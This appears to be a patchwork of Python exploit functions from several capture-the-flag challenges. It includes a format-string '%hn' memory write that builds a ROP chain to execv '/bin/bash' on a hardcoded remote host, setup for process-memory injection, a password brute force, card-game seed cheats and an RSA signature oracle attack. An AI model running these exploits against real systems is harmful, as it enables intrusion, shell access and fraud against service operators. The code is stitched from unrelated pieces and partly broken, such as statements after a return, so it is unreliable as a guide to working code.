def get_balance(self): self.do_send('2') match = b'Your currnet balance is (\w+) gitsCoins' res = self.conn.recv_until(PatternMatcher.fromre(match)) m = int(re.search(match, res).group(1)) if m > 999999: print(res) sys.exit(0) return m
def get(self, sig, bet): self.send_num(binascii.b2a_hex(sig)) self.send_num(binascii.b2a_hex(bet)) res = self.x.recv_until(PatternMatcher.frombytes(b'EOF<<\n')).decode() print('got >> ', res) if re.search('>>FAILED', res): return False m = re.search('E=(\w+)\nD=(\w+)', res) assert m return m.group(1).encode(), m.group(2).encode()
def get_return_cards(self, hand): cards = hand2cards(hand) self.oracle.send(' '.join([str(x) for x in cards])) self.oracle.send('\n') res = self.oracle.recv_until(PatternMatcher.frombytes(b'END\n')) res = res.decode()[:-4].rstrip() if len(res) == 0: return [] return [int(x) for x in res.split(' ')]
def go1(s, pwd, win=0): s.send('login ' + pwd + '\n') if win: pattern = b'Login successful' else: pattern = b'what you entered: (\w{12})' res = s.recv_until(PatternMatcher.fromre(pattern)) print(res) m = re.search(pattern, res) if not win: return int(m.group(1), 16) return 0
def load(self, pid): self.pid = pid helper = ProcHelper(self.pid) regions = helper.get_memory_regions() ld_res = regions.get_elf_entry(PatternMatcher.fromre('/ld')) libdl_res = regions.get_elf_entry(PatternMatcher.fromre('/libdl')) libc_res = regions.get_elf_entry(PatternMatcher.fromre('/libc')) target_region = query( regions.regions).where(lambda u: u.typ == 'stack').order_by( lambda u: u.size).then_by_descending().to_list()[0] self.page_start = target_region.start_addr self.target_addr = self.page_start + self.target_addr_off self.ld_elf = ElfUtils(ld_res.file, offset=ld_res.start_addr) self.libdl_elf = ElfUtils(libdl_res.file, offset=libdl_res.start_addr) self.libc_elf = ElfUtils(libc_res.file, offset=libc_res.start_addr, load_sym=False) self.inject_section = self.stage0_elf.get_section('.inject') self.stage0_entry_off = self.stage0_elf.get_symbol(self.stage0_sym)
def write_addr(x, sz, post=b'', wait=1): if sz <= 8: data = b'a' * sz else: data = '%0{}x'.format(sz) data = data.encode() data += '%{}$hn'.format(id_ptr_ctrl).encode() data += post data += b'D\n' x.send(data) if wait: res = x.recv_until(PatternMatcher.frombytes(b'D\n\n'))
def play(self, bet): self.conn.recv_until(PatternMatcher.frombytes(b'Play Video Poker')) self.do_send('3') self.conn.recv_until(PatternMatcher.frombytes(b'Bet:\n')) self.do_send(str(bet)) res = self.conn.recv_until( PatternMatcher.frombytes(b'Please supply your')).decode() m = re.search('Our Secret_hash is ([0-9a-f]+)\n', res) assert m host_hash = binascii.a2b_hex(m.group(1)) guessed_len = 0xe6 # prob 0.36? secret_len = 0xf4 secret = b'a' * 0x100 deck = get_default_deck() self.conn.send(deck) res = self.conn.recv_until( PatternMatcher.frombytes(b'Supply your secret')).decode() self.conn.send(secret) #print('deck >> ', deck) res = self.conn.recv_until( PatternMatcher.fromre(b'Which cards would')).decode() hand = re.search('Your starting hand is (\w+)\n', res).group(1) #print('hand is >> ', hand) return_hand = self.get_return_cards(hand) #print('return cards >> ', return_hand) send_hand = ''.join([str(x) for x in return_hand]) #print('sending >> ', send_hand) self.do_send(send_hand) res = self.conn.recv_until( PatternMatcher.fromre( b'The seed for our shuffle is [0-9a-f]+\n')).decode() sol_hash = re.search('shuffle is ([0-9a-f]+)\n', res).group(1) final_hand = re.search('Your ending hand is (\w+)\n', res).group(1) correct_seed = struct.unpack('<I', binascii.a2b_hex(sol_hash)[:4])[0]
def step1(conn): res = [encode(0) for i in range(5)] for i in range(5): reslist = [] for j in reversed(range(12)): pos = encode(j) res[i] = pos if pos[0] == 3 and pos[1] != 1: continue msg = '|'.join([f'{x},{y}' for x, y in res]) matcher = PatternMatcher.fromre(b'(SECONDS)|(GIVE ME A ROOM CODE)') mx = conn.send_and_expect(msg, matcher).decode() try: xx = re.search('IN ONLY ([\w.]+)', mx).group(1) time = float(xx) print('TIIIMIE ', time, xx) reslist.append((time, pos)) except: print('FUU ', mx) sx = 'YOU THIS TOKEN:\n>>> ' rem = mx[mx.find(sx) + len(sx):] token = rem[:rem.find('\n')] print('TOKEN IS ', token) roomnum = re.findall('\| (\S+)', rem) print('ROOM ', roomnum) roomnum.append('ADMIN') roomnum.append('GUEST') roomnum.append('DEBUG') #roomnum.append('/x#@-') #roomnum.append('[:$*;') #roomnum.append('/x#@-[:$*;') for i in range(110): roomnum.append(base64.b64encode(str(i).encode()).decode()) conn.recv_until('AND YOUR TOKEN') return token, roomnum print('BEST ', res[i]) res[i] = max(reslist)[1]
def main(): if 1: patch() return print(host, port) with Connection(host, port) as s: cnds=[] n=8 nx=len(alnum_list) T=0 H=(len(alnum_list)**n)-1 while T<=H: M=(T+H)//2 s.send('admin\n') buf=b'' v=M for i in range(n): buf+=alnum_list[v%nx] v//=nx buf=buf[::-1] s.send(buf+b'\n') print('on iter ', T, H, buf) res=s.recv_until(PatternMatcher.fromre(b'error code=(1|-1)|Successfully')) if res.find(b'Successfully')!=-1: print('found for ', buf) T=M break else: print(res) m=re.search(b'error code=(1|-1)', res) assert m if int(m.group(1))==1: T=M+1 else: H=M-1
def solve(): remote = 1 if remote: conn = Connection('52.6.64.173', 4545) else: conn = Process('./ebp') with conn as x: data = '' for i in range(60): data += '{}:%08x '.format(i + 1) data += '-1END\n' x.send(data.encode()) res = x.recv_until(PatternMatcher.frombytes(b'END\n')) res = res.decode() tb = [x.split(':') for x in res.split(' ')] tb.pop() tb = {int(x[0]): int(x[1], 16) for x in tb} print(res) global id_base_addr id_base_addr = tb[4] - 0x18 - 0xc - 3 * 4 g_int80 = 0xf761fa63 - 0xf7584979 + tb[44] mk = tb[12] & 0xffff if not mk < 0x300: return False expected_exit_off = 0xf7621150 - 0xf7619979 + tb[44] print('cxa should be at >> ', hex(expected_exit_off)) y = X86Machine(0) print(hex(tb[44])) #disp_ins(x, y,tb[44]-libc_id_off, 20) if 0: c = code.InteractiveConsole(locals=dict(locals(), **globals())) c.interact() return if 0: while True: try: data = input('next addr? ') data = data.split(' ') addr = int(data[0], 16) n = int(data[1]) res = do_read(x, addr, n) print(res) #disp_ins(x, y, addr, n) except KeyboardInterrupt: raise except Exception as e: print(traceback.print_exc()) pass libc_start = tb[44] - 9 if remote: execv_off = 0x9b100 else: execv_off = 0x000b3140 - 0x00018570 g_execv = libc_start + execv_off g_pop3 = 0x80485dd need_write = (tb[12] - 0x20) & 0xffff target = tb[12] & ~0xffff target_start = 0x340 target += target_start g_pop1 = 0x8048385 rop = RopBuilder(target, 4) rop.add('I', tb[12]) rop.add('II{I:_ref_path}{I:_ref_argv}{I:_ref_env}', g_execv, 0) rop.add('{#argv}{I:_ref_path}{#env}I', 0) rop.add('{#path}{"/bin/bash}?', 0) buf = rop.get() print(buf) for i in range(len(buf)): write_ctrl_addr(x, target + i) write_addr(x, buf[i]) write_ctrl_addr(x, tb[4] - 0x20) disp(x) input('final write') write_addr(x, target_start, buf, 0) c = code.InteractiveConsole(locals=dict(locals(), **globals())) c.interact() time.sleep(1) res = x.recv(1024) print(res) res = x.recv(1024) print(res) res = x.recv(1024) print(res) res = x.recv(1024) print(res) input('finish') return True
def main(): dsa = DSA.generate(512) data = [dsa.key.y, dsa.key.g, dsa.key.p, dsa.key.q] data_str = ','.join(map(str, data)) chunk_size = 64 chunks = [] for i in range((len(data_str) + chunk_size - 1) // chunk_size): tmp = data_str[64 * i:64 * i + 64].encode() chunks.append(binascii.b2a_hex(server_pub_enc.encrypt2(tmp)[0])) enc_key = b','.join(chunks) n = 0x345080e693fa74f29d5ccac2f13556bea2541231949e14d7cd86068e5adcbc3d5622936f770fab224beea0da967057fdd9cd8419561c77445fa8b358720afc9f3703acc4b3b6901140587d83477fd271d3499797f9582bb1a5c985804ff905055cc4efecedd70cacc219ca3ba49537d6268ab66aa1c639c1963e089f3a63aac9b8b n = 0x167c731ae38435961bd5322b2b0ec685027147d194b8096fc2bcadacbece96d29b11c93dff0417644387aaca8cbdaa3bc895fd787c8fed999c19efcda1b0603b79370e675fc3a7e5536c8b07566b845a2fb513735d7ddb5051d04fe129eae00f17896ca892087388249b4e68acf46ed6938338a03b3a542b2c20f861cbc86eab10751 n = 0x3ada6f51c3e3009b4b63bb14b710624f321248b12741559e29a487eaaa05167dfd9f712e1825769ba612595b81945e0def05c379cc11a4419a3bfa00f14c6ca43ec21306955fc16621025898b59219cc1c4e0474719dbc715f9c31344c9af39a3d954fedc39651f244ee2c333fe257125a97d4db45135b53eb2383714f302bcf6b6 n = 0x29b32eb59e7ee1c467e1cc952af0d531d9d3128fbd6aecab8394fddc016e7786267b212bdaf6d343fef51a7a8ebec644c65d040f70b99e5a5c570024328431d17800ecd478bcb6fb92c0dfd76fd7cea637d9317c1cdd90b9b30f548daa7e39fb5a9d289246e4b90ec665e797bc76587d4d19e2edb2e6269621910f83b17726240de12c18e69a n = 0xc56f3ad5b3eca2ea9920c4fb01a84bf6538e2a5dd9f776a9fa1b22590a8609bb4a03ed13c7c07aa82d792c5676c8296381518838b03444079604b88b1d5048d2da88c036201c1599da302532b94a0ba9902750748d491bbfb1c0da674b6cbba0c1fb6bb693080eabdd0c7096757c8b80fe8ca6d82cb1bc5151a30fa40f9ea982675b1 k = RSA.construct((n, 12)) x = PKCS1_OAEP.new(k) assert len(sys.argv) > 1 with Connection(remote, remote_port) as conn, Process(sys.argv[1]) as proc: print('ENCRYPT MOFO') try: len_sig = len(x.encrypt2(b'kfwefappa')[1]) except: print('EJSUS FAIL') raise print('ENCRYPT MOFO') sent_sig = 'YOU KAPPA F**K' prefix = '\x00' * (len_sig - len(sent_sig)) sig = prefix + sent_sig sig = sig.encode() db = [] y = Oracle(proc) y.send_num(hex(n)[2:].encode()) odd_max = 2 if 0: for i in range(0, odd_max): s = get_guess_for(i) print('ON STEP >> ', i) nbit = 10 for A in range(2**nbit): s2 = '' for j in range(nbit): if A >> j & 1: s2 += ' ' else: s2 += '\n' s2 = s + s2 gen = x.encrypt2(s2.encode())[1] print(gen) print(hex(n)) work = gen res = y.get(sig, work) if res: db.append(res) break else: assert False else: db.append([ b'a0fbbacc479a8a3af09aebdbb9ae30834a10699d9d618108514d88f308161577809ae60e182c75e0f95797806179363a4c17da900373a3879ac3a692dc5f8f8b1e022eee294dd7013858394fa2f366179f64c9ab0ff28c89b3a78b1a6b6a8852de7a3f5de4dbe6ae0667941e8283f4c3eaa22572cc4dd4dceef54251bd3cf4690d301', b'2a1fed419b80c8145524c84c9c1f2efdf598d18da0eecfd2892a8956358827e613cf05c505e9b902277727c889a7ff32ea0b4bbe018fc8acc33743cfa14d31597a0e879135edc1257c8815208817dc7f6ed470c4e75742890ec7f7604c7025afa4f0f6193e3df2925320553ea1c9be3982369dd2b35b2b858fc7ea029e132693e355' ]) db.append([ b'42de041b5d51a89aa133a02dcb108a0714344d6cd0e23cee44d0e64a7c03fcd7163a8195f106ab8664215d9d13efa63871189ddbf25a7aedb1803c6ae5d8c75bd3aa78ac934f68ff1b55d4984bd66b8e79d1b490d553f1f0b3d93c04101e78603e94e5577f6525f934bef8016497820831e9e6a4571e446334a98e1b9d99f015a1735', b'70f611574824ae1ca492657f842feb2fea44283f7e7cc1da42997df2a54402975a490b9ca3990c95536c93c317976d7db1c844575b5f3f12bd9cc4f83808f31635749dd58da1b4cb392b08131766472895db3beb16f5317f4477a0df71f84c22de477066ce0bc4468df5a68e2527390c561c8c177b823f824b6926acf17599447f509' ]) print('sending') conn.trash(1) conn.send(enc_key) while True: time.sleep(0.5) pattern = b'You have \$([0-9]+)\)\n' res = conn.recv_until(PatternMatcher.fromre(pattern)) monies = int(re.search(pattern, res).group(1)) assert res conn.send('{}\n'.format(monies)) conn.recv_until(PatternMatcher.frombytes(b'At what odds')) conn.send('{}\n'.format(odd_max)) conn.recv_until(PatternMatcher.frombytes(b'Alright, what is your')) send_with_sig(dsa, conn, binascii.b2a_hex(sig)) res = conn.recv_until( PatternMatcher.frombytes(b'Now what is your')) rng = re.search(b'the secure RNG is ([0-9]+)\n', res).group(1).decode() rng = int(rng) print('rng is >> ', rng) want = rng % odd_max uu = get_rsa_key_from_db(n, db[want]) print(uu) privkey = PKCS1_OAEP.new(RSA.importKey(uu)) guess = privkey.decrypt(sig) guess = int(guess[len("I hereby commit to a guess of "):]) send_with_sig(dsa, conn, uu)